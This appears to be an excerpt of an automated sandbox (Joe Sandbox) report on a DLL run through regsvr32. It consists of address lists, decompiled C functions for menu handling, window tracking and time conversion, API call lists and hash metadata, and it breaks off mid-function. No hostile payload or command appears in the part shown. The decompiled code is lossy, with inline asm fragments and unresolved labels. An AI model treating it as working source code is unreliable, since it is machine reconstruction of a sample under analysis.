                                                                        0x1001c798
                                                                        0x1001c7a8
                                                                        0x1001c7a8
                                                                        0x1001c4c1
                                                                        0x1001c4c4
                                                                        0x1001c4c7
                                                                        0x1001c4cd
                                                                        0x1001c4cf
                                                                        0x1001c4d5
                                                                        0x1001c4d5
                                                                        0x1001c4db
                                                                        0x1001c4e8
                                                                        0x1001c4f1
                                                                        0x1001c4f3
                                                                        0x1001c796
                                                                        0x1001c796
                                                                        0x00000000
                                                                        0x1001c796
                                                                        0x1001c4f9
                                                                        0x1001c4fc
                                                                        0x1001c50d
                                                                        0x1001c513
                                                                        0x1001c515
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c51b
                                                                        0x1001c51e
                                                                        0x1001c54b
                                                                        0x1001c54e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c550
                                                                        0x1001c553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c559
                                                                        0x1001c55c
                                                                        0x1001c560
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c569
                                                                        0x1001c56b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c574
                                                                        0x1001c576
                                                                        0x1001c578
                                                                        0x1001c582
                                                                        0x1001c582
                                                                        0x1001c584
                                                                        0x1001c587
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c589
                                                                        0x1001c57a
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c520
                                                                        0x1001c523
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c525
                                                                        0x1001c528
                                                                        0x1001c52c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c531
                                                                        0x1001c533
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c538
                                                                        0x1001c53a
                                                                        0x1001c53c
                                                                        0x1001c542
                                                                        0x1001c542
                                                                        0x1001c544
                                                                        0x1001c547
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c549
                                                                        0x1001c53e
                                                                        0x1001c540
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c540
                                                                        0x1001c52e
                                                                        0x1001c4fe
                                                                        0x1001c500
                                                                        0x00000000
                                                                        0x1001c500
                                                                        0x1001c4ea
                                                                        0x1001c4ea
                                                                        0x00000000
                                                                        0x1001c58e
                                                                        0x1001c58e
                                                                        0x1001c5a1
                                                                        0x1001c5a3
                                                                        0x1001c5a6
                                                                        0x1001c5a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c5ae
                                                                        0x1001c5ba
                                                                        0x1001c5bf
                                                                        0x1001c5c4
                                                                        0x1001c5c7
                                                                        0x1001c5e9
                                                                        0x1001c5ec
                                                                        0x1001c5ee
                                                                        0x1001c608
                                                                        0x1001c614
                                                                        0x1001c61a
                                                                        0x1001c61c
                                                                        0x1001c6d3
                                                                        0x1001c6d3
                                                                        0x1001c6d7
                                                                        0x1001c6d9
                                                                        0x1001c6dc
                                                                        0x1001c6e1
                                                                        0x1001c6e2
                                                                        0x00000000
                                                                        0x1001c6e2
                                                                        0x1001c637
                                                                        0x1001c639
                                                                        0x1001c63c
                                                                        0x1001c63e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c644
                                                                        0x1001c654
                                                                        0x1001c659
                                                                        0x1001c65c
                                                                        0x1001c65e
                                                                        0x1001c661
                                                                        0x1001c67f
                                                                        0x1001c681
                                                                        0x1001c69a
                                                                        0x1001c6a7
                                                                        0x1001c6ad
                                                                        0x1001c6af
                                                                        0x1001c6c3
                                                                        0x1001c6c3
                                                                        0x1001c6c6
                                                                        0x1001c6ca
                                                                        0x1001c6cc
                                                                        0x1001c6cd
                                                                        0x1001c6d2
                                                                        0x00000000
                                                                        0x1001c683
                                                                        0x1001c68d
                                                                        0x1001c68f
                                                                        0x1001c691
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x1001c5f0
                                                                        0x1001c5f4
                                                                        0x1001c5f9
                                                                        0x1001c5fa
                                                                        0x1001c5fd
                                                                        0x1001c5ff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x1001c5ee
                                                                        0x1001c4db

                                                                        APIs
                                                                        • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                        • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                        • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                        • String ID:
                                                                        • API String ID: 1773772771-0
                                                                        • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                        • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				int _v16;
                                                                        				signed int _v32;
                                                                        				intOrPtr _v36;
                                                                        				signed int _v40;
                                                                        				int _v44;
                                                                        				char _v48;
                                                                        				void* __ebp;
                                                                        				int _t59;
                                                                        				int _t60;
                                                                        				void* _t61;
                                                                        				int _t63;
                                                                        				signed int _t67;
                                                                        				int _t68;
                                                                        				void* _t69;
                                                                        				int _t71;
                                                                        				intOrPtr _t74;
                                                                        				int _t75;
                                                                        				int _t76;
                                                                        				struct HMENU__* _t88;
                                                                        				intOrPtr _t90;
                                                                        
                                                                        				_t74 = __ecx;
                                                                        				_v8 = __ecx;
                                                                        				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
                                                                        				if(_a12 == 0) {
                                                                        					_t90 = _a4;
                                                                        					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                                                        						L3:
                                                                        						E1001FFB4( &_v48);
                                                                        						_v36 = _t90;
                                                                        						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
                                                                        							if(GetMenu( *(_t74 + 0x1c)) == 0) {
                                                                        								L14:
                                                                        								_t59 = GetMenuItemCount( *(_t90 + 4));
                                                                        								_v40 = _v40 & 0x00000000;
                                                                        								_v16 = _t59;
                                                                        								if(_t59 <= 0) {
                                                                        									L34:
                                                                        									L35:
                                                                        									return _t59;
                                                                        								}
                                                                        								do {
                                                                        									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
                                                                        									_v44 = _t60;
                                                                        									if(_t60 == 0) {
                                                                        										goto L33;
                                                                        									}
                                                                        									if(_t60 != 0xffffffff) {
                                                                        										_v32 = _v32 & 0x00000000;
                                                                        										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
                                                                        											_t61 = 0;
                                                                        										} else {
                                                                        											_t61 = 1;
                                                                        										}
                                                                        										_push(_t61);
                                                                        										L27:
                                                                        										_push(_t74);
                                                                        										E1001FFDA( &_v48);
                                                                        										_t63 = GetMenuItemCount( *(_t90 + 4));
                                                                        										_t75 = _t63;
                                                                        										if(_t75 >= _v16) {
                                                                        											L32:
                                                                        											_v16 = _t75;
                                                                        											_t74 = _v8;
                                                                        											goto L33;
                                                                        										}
                                                                        										_v40 = _v40 + _t63 - _v16;
                                                                        										while(_v40 < _t75) {
                                                                        											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
                                                                        												goto L32;
                                                                        											}
                                                                        											_v40 = _v40 + 1;
                                                                        										}
                                                                        										goto L32;
                                                                        									}
                                                                        									_t67 = E1000822C(_t90, _v40);
                                                                        									_v32 = _t67;
                                                                        									if(_t67 == 0) {
                                                                        										goto L33;
                                                                        									}
                                                                        									_t68 = GetMenuItemID( *(_t67 + 4), 0);
                                                                        									_v44 = _t68;
                                                                        									if(_t68 != 0 && _t68 != 0xffffffff) {
                                                                        										_push(0);
                                                                        										goto L27;
                                                                        									}
                                                                        									L33:
                                                                        									_v40 = _v40 + 1;
                                                                        									_t59 = _v40;
                                                                        								} while (_t59 < _v16);
                                                                        								goto L34;
                                                                        							}
                                                                        							_t69 = E10023092(_t74);
                                                                        							if(_t69 == 0) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t88 = GetMenu( *(_t69 + 0x1c));
                                                                        							if(_t88 == 0) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t71 = GetMenuItemCount(_t88);
                                                                        							_t76 = 0;
                                                                        							_a12 = _t71;
                                                                        							if(_t71 <= 0) {
                                                                        								L13:
                                                                        								_t74 = _v8;
                                                                        								goto L14;
                                                                        							}
                                                                        							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
                                                                        								_t76 = _t76 + 1;
                                                                        								if(_t76 < _a12) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L13;
                                                                        							}
                                                                        							_push(_t88);
                                                                        							_v12 = E10026280();
                                                                        							goto L13;
                                                                        						}
                                                                        						_v12 = _t90;
                                                                        						goto L14;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(_a8);
                                                                        					_push(_t90);
                                                                        					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
                                                                        					if(0 != 0) {
                                                                        						goto L35;
                                                                        					}
                                                                        					goto L3;
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 10029BA4: GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                          • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                          • Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F
                                                                        • GetMenu.USER32(?), ref: 10032170
                                                                        • GetMenu.USER32(?), ref: 10032184
                                                                        • GetMenuItemCount.USER32 ref: 1003218D
                                                                        • GetSubMenu.USER32 ref: 1003219E
                                                                        • GetMenuItemCount.USER32 ref: 100321C0
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                        • GetMenuItemCount.USER32 ref: 10032240
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4186786570-0
                                                                        • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                        • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct tagPOINT _v20;
                                                                        				void* __ebp;
                                                                        				short _t42;
                                                                        				signed int _t49;
                                                                        				struct HWND__* _t60;
                                                                        				intOrPtr _t63;
                                                                        				intOrPtr _t66;
                                                                        				void* _t68;
                                                                        				void* _t71;
                                                                        				void* _t74;
                                                                        				intOrPtr _t83;
                                                                        				void* _t84;
                                                                        				intOrPtr _t85;
                                                                        				struct HWND__* _t87;
                                                                        				intOrPtr _t88;
                                                                        				intOrPtr* _t89;
                                                                        				void* _t90;
                                                                        
                                                                        				_t89 = __ecx;
                                                                        				_t42 = GetKeyState(1);
                                                                        				if(_t42 < 0) {
                                                                        					return _t42;
                                                                        				}
                                                                        				_t85 = E100373DB();
                                                                        				_v12 = _t85;
                                                                        				GetCursorPos( &_v20);
                                                                        				ScreenToClient( *(_t89 + 0x1c),  &_v20);
                                                                        				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
                                                                        				_v8 = _t49;
                                                                        				if(_t49 < 0) {
                                                                        					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
                                                                        				} else {
                                                                        					_t74 = E10023092(_t89);
                                                                        					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
                                                                        						_v8 = _v8 | 0xffffffff;
                                                                        					}
                                                                        					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                                                                        					if(_t66 != 0) {
                                                                        						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
                                                                        					} else {
                                                                        						_t88 = 0;
                                                                        					}
                                                                        					_t68 = E100220EE(_t90, GetCapture());
                                                                        					if(_t68 != _t89) {
                                                                        						if(_t68 != 0) {
                                                                        							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
                                                                        						} else {
                                                                        							_t83 = 0;
                                                                        						}
                                                                        						if(_t83 != _t88 && E10023092(_t68) == _t74) {
                                                                        							_v8 = _v8 | 0xffffffff;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				if(_v8 < 0) {
                                                                        					L25:
                                                                        					if( *(_v12 + 0x78) == 0xffffffff) {
                                                                        						KillTimer( *(_t89 + 0x1c), 0xe001);
                                                                        					}
                                                                        					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
                                                                        					goto L28;
                                                                        				} else {
                                                                        					ClientToScreen( *(_t89 + 0x1c),  &_v20);
                                                                        					_push(_v20.y);
                                                                        					_t87 = WindowFromPoint(_v20);
                                                                        					if(_t87 == 0) {
                                                                        						L23:
                                                                        						_t59 = _v12;
                                                                        						_v8 = _v8 | 0xffffffff;
                                                                        						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
                                                                        						L24:
                                                                        						if(_v8 >= 0) {
                                                                        							L28:
                                                                        							_t53 = 0xe000;
                                                                        							if(_a4 == 0xe000) {
                                                                        								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
                                                                        								if(_v8 >= 0) {
                                                                        									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
                                                                        								}
                                                                        							}
                                                                        							return _t53;
                                                                        						}
                                                                        						goto L25;
                                                                        					}
                                                                        					_t60 =  *(_t89 + 0x1c);
                                                                        					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                                                                        						goto L24;
                                                                        					} else {
                                                                        						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                                                                        						if(_t63 != 0) {
                                                                        							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
                                                                        						}
                                                                        						if(_t63 == _t87) {
                                                                        							goto L24;
                                                                        						} else {
                                                                        							goto L23;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x1002f5ea

                                                                        APIs
                                                                        • GetKeyState.USER32 ref: 1002F50D
                                                                        • GetCursorPos.USER32(?), ref: 1002F52C
                                                                        • ScreenToClient.USER32 ref: 1002F539
                                                                        • GetCapture.USER32 ref: 1002F586
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                        • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                        • IsChild.USER32 ref: 1002F5EE
                                                                        • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                        • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                          • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                          • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                        • String ID:
                                                                        • API String ID: 1383385731-0
                                                                        • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                        • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 69%
                                                                        			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v16;
                                                                        				signed int _v20;
                                                                        				intOrPtr _v24;
                                                                        				signed int _v28;
                                                                        				intOrPtr _v32;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				char _t72;
                                                                        				signed int _t74;
                                                                        				void* _t86;
                                                                        				void* _t88;
                                                                        				void* _t90;
                                                                        				void* _t92;
                                                                        				void* _t95;
                                                                        				void* _t98;
                                                                        				void* _t101;
                                                                        				void* _t105;
                                                                        				intOrPtr _t109;
                                                                        				intOrPtr _t111;
                                                                        				void* _t123;
                                                                        				signed int _t124;
                                                                        				signed int _t125;
                                                                        				void* _t127;
                                                                        				signed int _t133;
                                                                        				signed int _t138;
                                                                        				signed int _t139;
                                                                        				void* _t141;
                                                                        				signed int _t145;
                                                                        				signed int _t150;
                                                                        				signed int _t154;
                                                                        				signed int _t156;
                                                                        				signed int _t161;
                                                                        				signed int _t163;
                                                                        				void* _t171;
                                                                        
                                                                        				_t138 = __edx;
                                                                        				_t141 = __eax;
                                                                        				_t72 =  *((intOrPtr*)(__eax + 0x14));
                                                                        				asm("cdq");
                                                                        				_t154 = __edx;
                                                                        				_v16 = _t72;
                                                                        				_v12 = __edx;
                                                                        				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
                                                                        					L30:
                                                                        					_t139 = _t138 | 0xffffffff;
                                                                        					__eflags = _t139;
                                                                        					return _t139;
                                                                        				} else {
                                                                        					_t156 = _v12;
                                                                        					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
                                                                        						goto L30;
                                                                        					} else {
                                                                        						_t74 =  *(_t141 + 0x10);
                                                                        						if(_t74 < 0 || _t74 > 0xb) {
                                                                        							asm("cdq");
                                                                        							_t124 = 0xc;
                                                                        							_t138 = _t74 % _t124;
                                                                        							_t125 = _t138;
                                                                        							asm("cdq");
                                                                        							_v16 = _v16 + _t74 / _t124;
                                                                        							 *(_t141 + 0x10) = _t125;
                                                                        							asm("adc [ebp-0x8], edx");
                                                                        							if(_t125 < 0) {
                                                                        								_v16 = _v16 + 0xffffffff;
                                                                        								 *(_t141 + 0x10) = _t125 + 0xc;
                                                                        								asm("adc dword [ebp-0x8], 0xffffffff");
                                                                        							}
                                                                        							_t161 = _v12;
                                                                        							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
                                                                        								goto L30;
                                                                        							} else {
                                                                        								_t163 = _v12;
                                                                        								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
                                                                        									goto L30;
                                                                        								} else {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							L16:
                                                                        							_t145 =  *(_t141 + 0x10);
                                                                        							asm("cdq");
                                                                        							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
                                                                        							_v20 = _t138;
                                                                        							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
                                                                        								asm("adc ecx, 0x0");
                                                                        								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								goto L19;
                                                                        							} else {
                                                                        								L19:
                                                                        								if(_t145 > 1) {
                                                                        									_v24 = _v24 + 1;
                                                                        									asm("adc dword [ebp-0x10], 0x0");
                                                                        								}
                                                                        								L21:
                                                                        								_t138 = _v12;
                                                                        								_t127 = 0;
                                                                        								_t147 = _v16 - 1;
                                                                        								asm("sbb eax, ecx");
                                                                        								_v28 = _v12;
                                                                        								asm("adc edx, ecx");
                                                                        								_v32 = _v16 - 1;
                                                                        								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
                                                                        								asm("cdq");
                                                                        								asm("adc ecx, edx");
                                                                        								_v8 = _t138;
                                                                        								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
                                                                        								asm("sbb eax, edx");
                                                                        								_t90 = E10013780(_t147, _v28, 4, 0);
                                                                        								asm("adc eax, edx");
                                                                        								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
                                                                        								asm("adc eax, edx");
                                                                        								asm("adc eax, [ebp-0x10]");
                                                                        								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
                                                                        								_t123 = 0;
                                                                        								asm("sbb eax, ebx");
                                                                        								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
                                                                        								asm("cdq");
                                                                        								asm("adc edx, esi");
                                                                        								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
                                                                        								asm("cdq");
                                                                        								asm("adc edx, esi");
                                                                        								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
                                                                        								_t131 = _t101;
                                                                        								_t150 = _t138;
                                                                        								asm("cdq");
                                                                        								asm("adc edx, esi");
                                                                        								_t169 = _a4 - _t123;
                                                                        								_v16 =  *_t141 + _t101;
                                                                        								_v12 = _t138;
                                                                        								if(_a4 == _t123) {
                                                                        									_t105 = E10018BEF( &_v16);
                                                                        									L28:
                                                                        									if(_t105 == _t123) {
                                                                        										goto L30;
                                                                        									}
                                                                        									L29:
                                                                        									_t133 = 9;
                                                                        									return memcpy(_t141, _t105, _t133 << 2);
                                                                        								}
                                                                        								E100193FB(_t150, _t169);
                                                                        								_t109 =  *0x1004cde8; // 0x7080
                                                                        								asm("cdq");
                                                                        								_v16 = _v16 + _t109;
                                                                        								asm("adc [ebp-0x8], edx");
                                                                        								_t105 = E100134E7(_t131, _t138,  &_v16);
                                                                        								if(_t105 == _t123) {
                                                                        									goto L30;
                                                                        								}
                                                                        								_t136 =  *((intOrPtr*)(_t141 + 0x20));
                                                                        								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
                                                                        								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
                                                                        									_t111 =  *0x1004cdf0; // 0xfffff1f0
                                                                        									asm("cdq");
                                                                        									_v16 = _v16 + _t111;
                                                                        									asm("adc [ebp-0x8], edx");
                                                                        									_t105 = E100134E7(_t136, _t138,  &_v16);
                                                                        									goto L28;
                                                                        								} else {
                                                                        									goto L29;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}







































                                                                        0x1001334e
                                                                        0x100132d1
                                                                        0x100132b6

                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 10013342
                                                                        • __allrem.LIBCMT ref: 1001335A
                                                                        • __allrem.LIBCMT ref: 10013376
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                          • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                        • String ID: E
                                                                        • API String ID: 4106114094-3568589458
                                                                        • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                        • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                        				intOrPtr _t54;
                                                                        				int _t56;
                                                                        				char* _t57;
                                                                        				int _t68;
                                                                        				char* _t69;
                                                                        				int _t70;
